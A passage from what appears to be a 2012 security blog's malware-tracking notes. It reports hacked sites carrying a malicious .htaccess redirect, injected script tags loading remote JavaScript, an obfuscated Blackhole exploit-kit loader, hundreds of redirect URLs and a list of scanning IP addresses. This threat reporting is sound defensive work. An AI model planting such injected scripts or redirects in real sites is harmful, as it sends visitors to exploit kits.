chine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.thesea.org/media.php [R=301,L]

So far we detected more than 500 sites with this type of redirection in the last few days.

Malware from paysafecard.name

Published: 2012-06-07  by  Daniel B. Cid

Seeing many sites compromised with malware from paysafecard.name/analitics.js. This is the js inserted on the hacked pages:

<! --pizda-- ><script type=text/javascript  src= http://paysafecard.name/analitics.js?ftpid=19741></script><!--/pizda-->

Malicious redirections to exploit kits

Published: 2012-06-06  by  Daniel B. Cid

We talk a lot about sites that get hacked to redirect their users to malicious exploit kits (blackhole, etc). Very often we see encoded javascript and our users ask what they do... Those are some of the URLs we saw just this last week being used by the attackers.

aaasssasssssssasa.myfw.us/?go=2 abcplyjxj.ibiz.cc/?go=2 abdrfdvfgdrvser.lowestprices.at/?go=2 aeryaay2nyusmui7.lowestprices.at/?go=2 afrgbajp.ibiz.cc/d/404.php?go=1 akyjdcfovc.ibiz.cc/d/404.php?go=1 alph3464.no-ip.org/?go=2 amhdhsnjmx.usa.cc/d/404.php?go=1 amsmkxh.ibiz.cc/d/404.php?go=1 aoytzrk.igg.biz/d/404.php?go=1 apdqbnl.igg.biz/d/404.php?go=1 apkdng.xxxy.info/d/404.php?go=1 apmhyocvl.igg.biz/d/404.php?go=1 aprcredits.kwik.to/d/404.php?go=1 areabreytnt.lowestprices.at/?go=2 areahedun.findhere.org/?go=2 arhecug.tld.cc/d/404.php?go=1 arna5237.hopto.org/?go=2 artva3hsyjtis8ss.lowestprices.at/?go=2 aucvpqnebv.tld.cc/d/404.php?go=1 aukqjxs.usa.cc/d/404.php?go=1 avrrrqvrtyunbtgjtrty.lowestprices.at/?go=2 ayuqymox.ibiz.cc/d/404.php?go=1 badfgrcaxww.rr.nu/?go=2 baryaccvbrtvnj.byinter.net/?go=2 bastryavervct.byinter.net/?go=2 bety6uye4v5r6y.lowestprices.at/?go=2 bfbgfdfdfffghgvvbjj.rr.nu/?go=2 bfguzmf.ibiz.cc/d/404.php?go=1 bftvdcrdfgdrvfvcd.kwik.to/?go=2 bgkdgdkww.1dumb.com/d/404.php?go=1 bgqbioyqky.igg.biz/d/404.php?go=1 biseiuhfggf.rr.nu/?go=2 bkzkeypfxy.changeip.name/?go=1 bmfxsfgpbj.ddns.info/?go=2 bnugujngjuhgygjgh.kwik.to/?go=2 brtftghynuiuynbrtvrvfdgg.rr.nu/?go=2 bssjxted.usa.cc/d/404.php?go=1 btrvecydcvb.byinter.net/?go=2 btyinonds.rr.nu/?go=2 buihbqidt.ibiz.cc/d/404.php?go=1 bwtrvwtrvsrvdfb.byinter.net/?go=2 bxwtlawdpz.proxydns.com/d/404.php?go=1 bxwvnyofk.usa.cc/d/404.php?go=1 byeytnsbvhrtbt.byinter.net/?go=2 bytvedcffn.byinter.net/?go=2 bzmechl.igg.biz/?go=2 cdsrcvvy.myredirect.us/?go=2 cdxvuoyo.igg.biz/d/404.php?go=1 cgmzhjthg.igg.biz/d/404.php?go=1 cgyucykhuil.myfw.us/?go=2 chfkidjtybs.findhere.org/?go=2 ckdgmmeo.igg.biz/?go=2 cmlvugtb.ibiz.cc/d/404.php?go=1 cmrumpglb.myfw.us/?go=2 cngyyyucdmtynrt7t.rr.nu/?go=2 cntwshy.bigmoney.biz/?go=2 cpngdayqt.igg.biz/d/404.php?go=1 ctculsq.ibiz.cc/d/404.php?go=1 ctjcykgmmy.byinter.net/?go=2 ctrcvtfgdfc.rr.nu/?go=2 cuybcxizxdied.myredirect.us/?go=2 cxxxcvxccxvcxcxvxcc.findhere.org/?go=2 dddssddddsdsddddd.myfw.us/?go=2 dfgitffjr.igg.biz/?go=2 dfhgodjfg.rr.nu/?go=2 dfmnbvuieiorf.rr.nu/?go=2 dfnmmcvguierfd.rr.nu/?go=2 dgdbqpdvh.igg.biz/d/404.php?go=1 dghmkufdnr.findhere.org/?go=2 dmujkkz.igg.biz/d/404.php?go=1 dnbtvra56byyunyn7.lowestprices.at/?go=2 dpiwixdu.igg.biz/d/404.php?go=1 drihifpug.ibiz.cc/d/404.php?go=1 drjdrdjgyiuu.myfw.us/?go=2 dsyoylhbg.usa.cc/d/404.php?go=1 dtyisysrsrst.lookin.at/?go=2 dtynuyiuoiuyrewq3crth.lowestprices.at/?go=2 dvafaiw.igg.biz/?go=2 dwewphuamf.igg.biz/?go=2 dwpgdtk.igg.biz/d/404.php?go=1 dwrmdybckw.lookin.at/?go=2 ebbye5nez3z2zn5.findhere.org/?go=2 edknvzrqb.ibiz.cc/d/404.php?go=1 eeqmhjjhs.igg.biz/d/404.php?go=1 efehxuwclcj.rr.nu/?go=2 efylnux.usa.cc/?go=2 eksamekxo.myfw.us/?go=2 emjqjkxdur.ddns.ms/d/404.php?go=1 enrymrynzrbytr.myfw.us/?go=2 erateraervacer.myredirect.us/?go=2 erbzydbftfnt.lowestprices.at/?go=2 ertguinodkf.rr.nu/?go=2 eurbynydtybtvy.myfw.us/?go=2 euwqhtspec.dns1.us/d/404.php?go=1 evrtnnruxrnrt.myfw.us/?go=2 ewcjvkiufgv.lowestprices.at/?go=2 eweweeeeweweee.myfw.us/?go=2 eyglwirdba.mynetav.org/d/404.php?go=1 eyksvvuez.ibiz.cc/d/404.php?go=1 f%67j.U%67ly%41s.c%6Fm/b.js?google=4x243 faydplspl.findhere.org/?go=2 fbybldtb.igg.biz/d/404.php?go=1 fdesjhkjjl.lowestprices.at/?go=2 fdgffjhg.myfw.us/?go=2 fdgfjhgyyt.myfw.us/?go=2 fdghdjnbvcr.byinter.net/?go=2 fdgzdfghbs.findhere.org/?go=2 fdsdcjytygui.myfw.us/?go=2 ffymxtbfrb.byinter.net/?go=2 fghmxmzbsxtr.findhere.org/?go=2 fgj.UglyAs.com/b.js?google=4x243 fgxbyninbyacw5v9bg.lowestprices.at/?go=2 fiudertjkfjgf.rr.nu/?go=2 fjljzl.xxuz.com/d/404.php?go=1 fmhjxgxn.ibiz.cc/d/404.php?go=1 fmhotwneiv.ibiz.cc/d/404.php?go=1 fncnkvqiuo.ikwb.com/d/404.php?go=1 fnwcmrnh.usa.cc/?go=2 fqmhypjfv.ibiz.cc/?go=2 fsbbihiwm.igg.biz/?go=2 ftbhstrrrrrrvtjyun4kk.lowestprices.at/?go=2 ftyktrtukghui.myfw.us/?go=2 fugqhewma.igg.biz/d/404.php?go=1 fxqkcicgp.kwik.to/?go=2 fyuidnysutms.kwik.to/?go=2 fyvmnfvb.ibiz.cc/?go=2 fzdzyrhysr.byinter.net/?go=2 gcyyaniw.tld.cc/d/404.php?go=1 gfdjhljkjb.myfw.us/?go=2 gfdxtcfvb.myredirect.us/?go=2 gfhmgvjhb.myfw.us/?go=2 ghceswze.dns05.com/d/404.php?go=1 ghdmghjdnx.findhere.org/?go=2 gjboeqpgly.usa.cc/d/404.php?go=1 gjxmrxfm.ibiz.cc/d/404.php?go=1 gnxnyubrzytuy.lowestprices.at/?go=2 grcdyctkfb.myfw.us/?go=2 grcvjuykini.byinter.net/?go=2 grllqdvv.igg.biz/d/404.php?go=1 gwvrteyrvf.byinter.net/?go=2 gxdtrdcv.myfw.us/?go=2 gxsiwmxki.usa.cc/d/404.php?go=1 gxswmxew.ibiz.cc/d/404.php?go=1 gyxrbktsj.igg.biz/d/404.php?go=1 hbdfvtfhhgjwrrtvytsw.kwik.to/?go=2 hemfnlqvit.igg.biz/d/404.php?go=1 hfcuytfkuby.myfw.us/?go=2 hfgcfweryer.findhere.org/?go=2 hgcnhfghj.lowestprices.at/?go=2 hgfdxhfcf.myredirect.us/?go=2 hhcenlq.igg.biz/d/404.php?go=1 higmkxgail.myfw.us/?go=2 hiolafr.usa.cc/d/404.php?go=1 hjgjxgfkjl.myfw.us/?go=2 hjkllllhhggggfffvvbbbn.findhere.org/?go=2 hqwkmqcw.igg.biz/d/404.php?go=1 hsbfvtrcdf.byinter.net/?go=2 hsdiljzff.igg.biz/?go=2 htdxtsth.myfw.us/?go=2 htrxcytvfmhg.lowestprices.at/?go=2 htupjnh.usa.cc/d/404.php?go=1 hvajsve.usa.cc/d/404.php?go=1 hxzwrfupqejv.ontheweb.nu/?go=2 hygviybg.myredirect.us/?go=2 ibeshqlc.usa.cc/d/404.php?go=1 ifagxfzl.ibiz.cc/?go=2 ifpbvcjfg.toythieves.com/d/404.php?go=1 igyryiplgve.findhere.org/?go=2 ihhqeabdsp.igg.biz/d/404.php?go=1 ijbctmcec.tld.cc/d/404.php?go=1 ilnliuikouiknjihk.kwik.to/?go=2 impiofkl.usa.cc/d/404.php?go=1 inthlbkehg.tld.cc/d/404.php?go=1 ionswxedsw.igg.biz/d/404.php?go=1 ipdgzjho.igg.biz/d/404.php?go=1 isphrnj.ibiz.cc/?go=2 isytayms.dyndnst.info/?go=2 itimihqrqa.ns01.biz/d/404.php?go=1 itunesg.ibiz.cc/?go=2 iweayvuav.igg.biz/?go=2 ixfnzhz.tld.cc/d/404.php?go=1 izcqqhfrgu.tld.cc/d/404.php?go=1 jcyatwzs.igg.biz/d/404.php?go=1 jdeqeyay.igg.biz/d/404.php?go=1 jent2207.myvnc.com/?go=2 jfgwryykjgf.findhere.org/?go=2 jfhtsfvvfghr.findhere.org/?go=2 jjjllaf.igg.biz/?go=2 jkhgcxdjl.myfw.us/?go=2 jmcbhjuv.usa.cc/d/404.php?go=1 jocxqfdgl.moneyhome.biz/d/404.php?go=1 jqtgdbdd.igg.biz/d/404.php?go=1 jrqnlzqy.usa.cc/?go=2 jsulftmiuw.igg.biz/d/404.php?go=1 jurtdfghtew.findhere.org/?go=2 jvqoovjxxq.igg.biz/d/404.php?go=1 jwtaqhw.ibiz.cc/d/404.php?go=1 jxdfggbfrhf.findhere.org/?go=2 jxsgnvxfg.findhere.org/?go=2 jygvfjhgjhjk.byinter.net/?go=2 jyhtgxycg.myfw.us/?go=2 jysresgfcb.byinter.net/?go=2 kchojcd.ibiz.cc/d/404.php?go=1 kgpoqamori.igg.biz/d/404.php?go=1 kgscnhzeb.igg.biz/d/404.php?go=1 khapgtil.ibiz.cc/d/404.php?go=1 kksnisqtj.tld.cc/d/404.php?go=1 klvrxsys.1dumb.com/d/404.php?go=1 kmurquryp.igg.biz/?go=2 knvflrl.ibiz.cc/?go=2 kpkdkuhrvd.usa.cc/d/404.php?go=1 ksfiolq.ibiz.cc/?go=2 ktntwxcy.usa.cc/?go=2 kubgfghzy.igg.biz/?go=2 kukchvgjh.myfw.us/?go=2 kuyicutdtvrfh.byinter.net/?go=2 kuyyctrdtfybgh.myfw.us/?go=2 kyubdyyyb.lookin.at/?go=2 kznfykfj.1dumb.com/d/404.php?go=1 lahkfbswvx.igg.biz/d/404.php?go=1 lbxdmes.usa.cc/?go=2 lczkbeujxf.kwik.to/?go=2 ldsysgcaix.igg.biz/d/404.php?go=1 ldwosuep.ibiz.cc/d/404.php?go=1 lioerpcbi.myfw.us/?go=2 lnfkwqcdj.findhere.org/?go=2 lnnpcsttih.findhere.org/?go=2 lnxnib.zyns.com/?go=2 lturvqaq.ibiz.cc/d/404.php?go=1 managemented123.usa.cc/d/404.php?go=1 maxqvjifc.usa.cc/d/404.php?go=1 mcpivmu.igg.biz/d/404.php?go=1 mcrbhdlfwb.usa.cc/d/404.php?go=1 mcxfvqntr.igg.biz/d/404.php?go=1 mdin7tuity.kwik.to/?go=2 meyevbbsa.usa.cc/d/404.php?go=1 mfundghbhhxfbty3nxd.rr.nu/?go=2 mhoqccnlag.ibiz.cc/?go=2 mjqrpybpkn.ontheweb.nu/?go=2 mkulorefj.igg.biz/d/404.php?go=1 mmnvvipxm.igg.biz/d/404.php?go=1 mnhgfcyvtvb.myredirect.us/?go=2 molycribf.usa.cc/d/404.php?go=1 mouzyyza.myftp.name/d/404.php?go=1 movnxnwh.igg.biz/d/404.php?go=1 mpnnythpdxt.kwik.to/?go=2 mqvtrt.got-game.org/?go=2 mqyenu.dns05.com/d/404.php?go=1 mr8o067nrtrvr.myfw.us/?go=2 mremfzlt.igg.biz/d/404.php?go=1 msr5bumdtbcg5nebr.findhere.org/?go=2 mtyndtyudnzst6ymu87u.rr.nu/?go=2 mxngnfbfgg.kwik.to/?go=2 mxnjnwvbad.lookin.at/?go=2 mytindbfxxt.lowestprices.at/?go=2 nbnvnvvbvbvvvbnvvbnvnb.findhere.org/?go=2 nbtdyurnbtdy.lowestprices.at/?go=2 ndbussg.rr.nu/?go=2 ndqrpmr.igg.biz/?go=2 ndrttev4btrytn.ontheweb.nu/?go=2 ndttbyy5ntyn87n.lowestprices.at/?go=2 ndtwr567nkyur7y.lowestprices.at/?go=2 ndytnibterbtyqvj654.lowestprices.at/?go=2 ne56b7n8nuybytb.lowestprices.at/?go=2 nelzhbv.qhigh.com/d/404.php?go=1 netyjw55q6u.myfw.us/?go=2 nfeqrhe.usa.cc/?go=2 ngbfbgnbjkcjhnbty5.rr.nu/?go=2 ngfytrtu.myfw.us/?go=2 nhthzkwhu.ibiz.cc/?go=2 nird56tybun.lowestprices.at/?go=2 niyaimuns.igg.biz/d/404.php?go=1 niyqbxwenz.ibiz.cc/d/404.php?go=1 njphwkb.ibiz.cc/d/404.php?go=1 njuyiulbtobt.rr.nu/?go=2 nklxaeum.usa.cc/?go=2 nmmnvqtyp.ibiz.cc/d/404.php?go=1 nmwakcu.itsaol.com/d/404.php?go=1 nmxbrjst.freetcp.com/d/404.php?go=1 nnpfucpvtf.tld.cc/d/404.php?go=1 nstrbusrvae.lookin.at/?go=2 ntdyubxrtuutt.myfw.us/?go=2 ntdyuemn565ntyne.lowestprices.at/?go=2 ntgdtwpq.ns1.name/d/404.php?go=1 ntxtnrnnnntbevdr5y.findhere.org/?go=2 ntydstrnbstbbr.lookin.at/?go=2 nuprhvper.tld.cc/d/404.php?go=1 nvxcvjwzk.ibiz.cc/d/404.php?go=1 nwfufzawwsn.findhere.org/?go=2 nxfbfxgyxjnft.byinter.net/?go=2 nymfiultrnb65ert.lowestprices.at/?go=2 nysbrtyjdjntytdrj7yn.rr.nu/?go=2 nytndbssyrtkjuykiryu7.rr.nu/?go=2 nytubdtynsb.lookin.at/?go=2 nzerynzbrnnt666.myfw.us/?go=2 nzvnrovc.igg.biz/d/404.php?go=1 oaijvhw.igg.biz/?go=2 ocafqqsgcz.usa.cc/d/404.php?go=1 ocapyaj.ibiz.cc/?go=2 odzyzjyyi.rr.nu/?go=2 oemiflwymu.igg.biz/d/404.php?go=1 ofhnhiunuby.findhere.org/?go=2 ofjqucwku.ibiz.cc/d/404.php?go=1 ogfazhv.2waky.com/d/404.php?go=1 oibmugez.igg.biz/d/404.php?go=1 ok56gpnu99o.ce.ms/i.php?go=1 olnlueg.igg.biz/d/404.php?go=1 onfszvzfgnh.findhere.org/?go=2 oooppoooopopoo.myfw.us/?go=2 orla8631.myvnc.com/?go=2 orpdvovqpya.kwik.to/?go=2 otsiwakbbic.lookin.at/?go=2 ovczsiob.ibiz.cc/d/404.php?go=1 pamajmc.ibiz.cc/d/404.php?go=1 pduullvgyq.usa.cc/d/404.php?go=1 petyxbyeff.findhere.org/?go=2 pfugkrt.sixth.biz/d/404.php?go=1 pggjwuefsz.tld.cc/d/404.php?go=1 phairthcph.igg.biz/d/404.php?go=1 pirdppqqgh.youdontcare.com/?go=1 piuyvdredh.myfw.us/?go=2 popohgjgfdsre.lowestprices.at/?go=2 pufvepwsih.mynumber.org/d/404.php?go=1 pvpafdf.wikaba.com/?go=1 pwfoqrywto.dns1.us/i/i.php?go=1 pzpmsuov.tld.cc/d/404.php?go=1 pzyvxip.organiccrap.com/?go=2 qanystvhc.ibiz.cc/d/404.php?go=1 qerhkbdimoitvd5t.lowestprices.at/?go=2 qhpqtctciu.serveuser.com/d/404.php?go=1 qivtnqqxjnp.myfw.us/?go=2 qjfngeyij.youdontcare.com/d/404.php?go=1 qjjcafhy.tld.cc/d/404.php?go=1 qmptsbnjd.ibiz.cc/d/404.php?go=1 qnanrttdbj.lookin.at/?go=2 qnpixhly.igg.biz/d/404.php?go=1 qqfwyig.tld.cc/d/404.php?go=1 qqhtedw.ddns.info/i/i.php?go=1 qvawkcfcf.ibiz.cc/d/404.php?go=1 qwerppitrty.findhere.org/?go=2 qyjkiuopo.myfw.us/?go=2 qyqjnvmau.dyndnst.info/?go=2 r6vgetyfvf.byinter.net/?go=2 rbiunhdfklgfkl.rr.nu/?go=2 rbytjetbyvert.myfw.us/?go=2 reererrerereeeeeeeeetttg.findhere.org/?go=2 rhtbjgw.ibiz.cc/?go=2 rhtxfccdij.usa.cc/?go=2 rjnotxs.igg.biz/d/404.php?go=1 rjytkixbfjxkk.myfw.us/?go=2 rkoidbyobh.ibiz.cc/d/404.php?go=1 rmszsbqanuitrnt5.findhere.org/?go=2 rntbrtbxfggby.lowestprices.at/?go=2 rozadyqa.ibiz.cc/?go=2 rpwrxclxj.ibiz.cc/d/404.php?go=1 rqerjgezr.igg.biz/?go=2 rsbtyhrstyybrrtb2.lowestprices.at/?go=2 rsetvonmph.ibiz.cc/d/404.php?go=1 rtiuofgjdjfhkfgg.myredirect.us/?go=2 rtnssb5av3ybz.findhere.org/?go=2 rtyyujymdsrr.findhere.org/?go=2 runiytdtb.findhere.org/?go=2 rxtnusrbsvaerby.lowestprices.at/?go=2 ryeyymburbyr.myredirect.us/?go=2 sadjgkhiudfhg.byinter.net/?go=2 sakuhnsdcfjh.byinter.net/?go=2 sawrtdlsf.ibiz.cc/d/404.php?go=1 sbrtyvabyrr.lookin.at/?go=2 sbrvtctaxert.byinter.net/?go=2 scecsdfxersrecsfd.kwik.to/?go=2 sdbwrrrim.etowns.org/?go=2 sdfghbhevbsc.byinter.net/?go=2 sdidiobnjfhfk.myredirect.us/?go=2 sduhfwbeh.byinter.net/?go=2 sdvarfvgd.findhere.org/?go=2 seoyaaoad.igg.biz/d/404.php?go=1 siyaxrba.igg.biz/d/404.php?go=1 skpyirkxx.dynamic-dns.net/d/404.php?go=1 snavraetyrstvervg.lowestprices.at/?go=2 soisuthjkxjcbn.myredirect.us/?go=2 srtbhvsrbshfxb.byinter.net/?go=2 svaverbxrrtyvt.rr.nu/?go=2 sxbnckviofg.rr.nu/?go=2 sycrfuynhijj.myfw.us/?go=2 szdzaidns.toh.info/?go=2 tbuyegf.igg.biz/d/404.php?go=1 tdyudtbdy.lowestprices.at/?go=2 tevjyfbtfyh.byinter.net/?go=2 tgrukjhggfdwe.lowestprices.at/?go=2 thodwcxg.ibiz.cc/d/404.php?go=1 tlegjzpo.usa.cc/d/404.php?go=1 trev8246.myftp.org/?go=2 trhhiuyu.myfw.us/?go=2 trhpxtwr.ibiz.cc/?go=2 trpvptu.xxuz.com/d/404.php?go=1 truygdfijhgjkd.myredirect.us/?go=2 trwrdaypds.igg.biz/?go=2 tuntrsbrtbtung.lowestprices.at/?go=2 twenbrmndfui.myredirect.us/?go=2 txmovebnx.tld.cc/d/404.php?go=1 tyapxh.ddns.us/d/404.php?go=1 tyehybtgdhgef.myfw.us/?go=2 tyuntuytmii.myfw.us/?go=2 ucvndsb.proxydns.com/d/404.php?go=1 udkuiurooa.igg.biz/d/404.php?go=1 ueixlydyprxg.byinter.net/?go=2 uhfcmgtlnbkm.byinter.net/?go=2 uhjqzvcjfmb.ontheweb.nu/?go=2 uimflmxbtr.lookin.at/?go=2 uirkxfpa.igg.biz/d/404.php?go=1 ulfbtsrbx.lookin.at/?go=2 uljyynp.igg.biz/d/404.php?go=1 uonjjmcw.ibiz.cc/d/404.php?go=1 upcihiteyf.usa.cc/?go=2 upsgollo.ibiz.cc/d/404.php?go=1 uqhnrrqrql.findhere.org/?go=2 usrvbzrbyeab.lowestprices.at/?go=2 utopgjmrao.kwik.to/?go=2 uuuiuiiuuiuuiiuuuu.myfw.us/?go=2 uuuyuyyyyuuyuu.myfw.us/?go=2 uwhnuls.sexxxy.biz/d/404.php?go=1 uxkrlnxrhn.ibiz.cc/d/404.php?go=1 uyguyfdyjcf.lowestprices.at/?go=2 uzzlkmftmi.igg.biz/d/404.php?go=1 varbasrtbat.lookin.at/?go=2 vdtgbrgdgxtrstgvffvf.kwik.to/?go=2 vgjyttswcvj.lowestprices.at/?go=2 vhanclmstq.ibiz.cc/d/404.php?go=1 vjdiorpyfkjgfd.rr.nu/?go=2 vjlnwoof.dhcp.biz/d/404.php?go=1 vkhtdup.usa.cc/d/404.php?go=1 vkmdkimrpfsq.lookin.at/?go=2 vkwliwg.ibiz.cc/d/404.php?go=1 vmpjbiek.igg.biz/?go=2 vnpddighhfhb.rr.nu/?go=2 vooshvwxov.usa.cc/?go=2 vplzqlevmo.igg.biz/?go=2 vpwmdyaayb.igg.biz/d/404.php?go=1 vrtvkrhlg.igg.biz/?go=2 vrzbfnbf.ibiz.cc/?go=2 vymsygn.ibiz.cc/d/404.php?go=1 vzdqgxkj.ftpserver.biz/d/404.php?go=1 weihofdjkndurr.myredirect.us/?go=2 weiulfe.3d-game.com/?go=2 weswznfdlw.2waky.com/d/404.php?go=1 wfyczxb.usa.cc/d/404.php?go=1 wgeraervar.myfw.us/?go=2 wgykabjnh.usa.cc/d/404.php?go=1 whhmmoj.tld.cc/d/404.php?go=1 wiscfggtu.findhere.org/?go=2 wkicfzk.ddns.name/d/404.php?go=1 wmqjrtzhvw.igg.biz/d/404.php?go=1 wmqspbvifaw.byinter.net/?go=2 wrcpvznhjw.igg.biz/?go=2 wrgvetyfcdvf.byinter.net/?go=2 wsesprk.igg.biz/d/404.php?go=1 wupmexgddr.ibiz.cc/d/404.php?go=1 wwwrhyrty3tg.myfw.us/?go=2 wyphlwynl.myfw.us/?go=2 xaetthkkm.rr.nu/?go=2 xakibl.dynamicdns.org.uk/d/404.php?go=1 xaweazv.dns04.com/?go=1 xbcqifsyyx.igg.biz/d/404.php?go=1 xbfgzhvdfggggfff.rr.nu/?go=2 xbyrtyjffn.byinter.net/?go=2 xdrbtxeryey.myfw.us/?go=2 xeyuzgha.igg.biz/d/404.php?go=1 xghvbmnbse.lowestprices.at/?go=2 xghxccvfghtygw82.kwik.to/?go=2 xgmdntbxntr.myfw.us/?go=2 xgnghacwvh.dns1.us/d/404.php?go=1 xnwdxqo.igg.biz/?go=2 xprbatoar.myfw.us/?go=2 xqzhtkda.ibiz.cc/d/404.php?go=1 xrtiddm.bigmoney.biz/?go=2 xvpocbfc.igg.biz/?go=2 xycujqm.ns02.biz/d/404.php?go=1 xytuxmftzbdrv.lookin.at/?go=2 ybdtyndbjtvftb.myfw.us/?go=2 ydfpcjcc.usa.cc/d/404.php?go=1 yenxcsdulxap.myfw.us/?go=2 ygpisqql.igg.biz/d/404.php?go=1 yiiyfdhouk.usa.cc/?go=2 ymenowmg.ibiz.cc/?go=2 ymtdimnbsa.rr.nu/?go=2 ynkahqdxu.kwik.to/?go=2 yrdvjt.fartit.com/d/404.php?go=1 ytimndkybbtt.lookin.at/?go=2 ytryrytrfghfhghthfgfg.findhere.org/?go=2 ytuyiyvtv.byinter.net/?go=2 ytvxszoxsh.mynumber.org/d/404.php?go=1 yunssbzdrvy.lowestprices.at/?go=2 yunyiryunrbe.myfw.us/?go=2 yvlegmruw.ibiz.cc/d/404.php?go=1 yvymolzcbi.lookin.at/?go=2 yxxpjvlq.igg.biz/d/404.php?go=1 yyntnjnxrt.igg.biz/d/404.php?go=1 zavydwnsi.igg.biz/d/404.php?go=1 zbanrdrhh.ibiz.cc/d/404.php?go=1 zdrynztums.findhere.org/?go=2 zdymydindbyu.byinter.net/?go=2 zdyskrsmo.faqserv.com/d/404.php?go=1 ze4tvzbterbny.myfw.us/?go=2 zerymrbrtyrjydn.myfw.us/?go=2 zfhbsvcererr.myredirect.us/?go=2 zfwfkxidn.ibiz.cc/?go=2 zgglfahozq.ibiz.cc/d/404.php?go=1 zguzmbzde.tld.cc/d/404.php?go=1 zhipmylfi.ibiz.cc/?go=2 zjcfzje.usa.cc/?go=2 zjdjtygx.usa.cc/d/404.php?go=1 zjogtwkkslo.myfw.us/?go=2 zknvjmzerm.igg.biz/?go=2 zlsngkwojh.ibiz.cc/d/404.php?go=1 zmarlpglt.ibiz.cc/?go=2 zrymznxbf.lookin.at/?go=2 zrywfrpeo.bounceme.net/i/i.php?go=1 zuxalwcg.tld.cc/d/404.php?go=1 zvcweflptt.ibiz.cc/d/404.php?go=1 zwebterbze.myfw.us/?go=2 zwmxyfnyvm.jetos.com/d/404.php?go=1 zxcjoitre43wi.lowestprices.at/?go=2 zytmnnfcfb.lookin.at/?go=2 zyuyknxu.ibiz.cc/d/404.php?go=1

Encoded javascript

Published: 2012-06-05  by  Daniel B. Cid

Interesting redirection from lolotrololo.1dumb.com:

document.write(unescape("<script src = "http://lolotrololo.1dumb.com/n/40">..

Which redirects to http://indefw.bee.pl/info.php?n=40&p=n.

Blackhole exploit kits

Published: 2012-06-04  by  Daniel B. Cid

Seeing some variations on how sites are getting hacked to link to the blackhole exploit kit. This is the type of encoded javascript we are seeing inserted into sites now:

<script>try{q.appendChild(q+"");}catch(qw){h=-012/5;f="fromCharC";}try{begbe=prototype;}catch(b43gds){ss=[];f+=(h&&f)?"ode":"";w=this;e = e val;n=[-0.5,-0.5,47.5,46,11,15,45, 50.5,44.5,53.5,49.5,45.5,50,53,18,46.5,45.5,53,29.5,49,45.5,49.5,45.5,50,53,52.5,28,55.5,37,43.5,46.5, 34,43.5,49.5,45.5,15,14.5,44,50.5,45,55.5,14.5,15.5,40.5,19,41.5,15.5,56.5,1.5,-0.5,-0.5,-0.5,47.5,46,52,43.5, 49.5,45.5,52,15,15.5,24.5,1.5,-0.5,-0.5,57.5,..]; for(i=6-2-1-2-1;-583+i!=2-2;i++) { k=i; ss=ss+ String[f](  -1  *h *(5+1 *n[k])); } e ( ss); }

Which are pointing to multiple URLs on the .gg.biz and .rr.nu TLD ( ex: http://dmujkkz.igg.biz/d/404.php?go=1, odzyzjyyi.rr.nu, mqvtrt.got-game.org, etc). More details to come.

List of IP addresses scanning for vulnerable timthumb.

Published: 2012-05-31  by  Daniel B. Cid

A few days ago, we posted a list of domains hosting webshells for timthumb related attacks. We identified more than 420 different URLs hosting those backdoors.

What is interesting is that during the same period, we identified almost 1,000 ip addresses scanning sites for vulnerable thimthumb scripts on WordPress themes and plugins. Those are all the ips and the number of hits we detected:

507 209.235.136.112 467 37.59.87.162 312 212.122.222.32 268 88.191.116.184 245 216.69.224.11 236 184.171.241.132 225 94.23.230.97 207 216.75.35.176 207 209.235.136.116 196 67.228.195.2 178 176.31.124.28 142 46.105.99.187 133 88.198.164.237 128 176.31.239.45 126 200.98.137.215 112 209.235.136.113 108 193.34.131.144 107 64.9.215.134 102 201.47.74.114 101 72.32.123.95 98 74.63.216.3 94 77.79.121.92 93 94.73.156.146 93 72.47.192.128 93 1.234.4.69 85 95.163.15.34 85 64.15.152.22 85 184.107.220.98 84 91.121.89.20 84 178.32.137.94 81 217.160.5.94 80 91.121.79.95 78 166.84.191.131 77 93.185.96.93 75 174.133.215.253 73 70.33.214.245 73 67.228.123.91 72 50.47.58.114 72 46.105.115.5 71 190.14.239.48 70 174.142.90.84 69 216.114.213.226 66 66.151.184.205 66 173.212.211.203 65 84.88.226.250 64 207.44.149.66 63 91.121.95.127 63 91.121.18.122 61 88.190.23.29 58 89.36.133.62 58 80.82.118.244 58 31.7.34.14 58 194.88.212.212 58 188.165.249.102 57 92.114.87.156 57 37.59.42.18 56 219.83.123.173 55 79.99.133.138 55 50.97.215.122 55 213.171.37.206 55 119.110.97.142 54 83.143.81.242 54 203.217.172.52 52 121.125.79.179 51 177.12.161.31 50 189.38.90.45 49 208.116.60.43 48 67.218.96.160 47 207.210.231.42 46 24.35.157.72 46 204.232.204.219 45 109.104.76.142 44 80.82.116.51 44 216.18.193.140 43 77.109.127.41 42 210.127.253.245 42 205.186.132.28 41 91.121.68.33 41 90.198.87.118 41 83.169.39.233 40 203.201.173.150 39 70.32.83.233 39 200.98.147.111 39 176.9.21.235 38 91.121.161.131 38 31.210.113.232 37 91.195.214.12 36 80.91.80.242 36 64.34.166.146 36 188.165.254.104 35 31.210.48.34 35 200.98.149.187 35 184.106.130.234 34 72.232.194.50 34 216.218.208.130 34 207.250.111.6 34 188.132.228.146 33 87.253.155.151 33 188.165.212.9 33 188.121.54.44 33 184.106.150.41 32 87.106.109.97 32 148.241.188.18 31 75.149.34.188 30 69.167.133.185 30 218.38.16.26 30 176.28.19.216 30 174.142.75.147 29 69.42.88.156 29 188.165.202.170 29 173.212.203.6 28 80.219.214.145 28 70.33.209.156 28 27.50.124.174 28 178.63.60.83 27 94.23.39.53 27 94.124.120.40 27 81.196.196.141 27 79.121.103.71 27 72.32.115.16 27 37.58.64.66 27 222.122.45.146 27 213.85.69.7 27 213.188.134.17 27 212.67.205.187 26 89.18.182.140 26 46.254.17.117 26 210.127.253.231 26 207.99.28.140 26 205.186.152.222 26 200.98.141.45 26 108.175.148.210 25 95.174.19.90 25 79.143.188.72 25 74.54.205.26 25 72.10.49.128 25 62.109.4.88 25 50.57.91.85 25 211.255.32.19 25 205.209.161.221 24 91.201.52.37 24 89.33.197.242 24 70.39.150.59 24 61.38.186.176 24 222.124.218.40 24 212.227.54.144 24 195.42.120.70 24 195.19.204.151 24 190.0.226.14 24 174.123.101.124 24 118.41.250.223 24 109.71.26.49 23 94.23.220.68 23 93.186.201.250 23 59.120.147.250 23 50.28.53.201 23 50.22.152.66 23 49.50.8.63 23 184.169.217.29 22 85.25.100.143 22 64.37.49.129 22 212.84.65.11 22 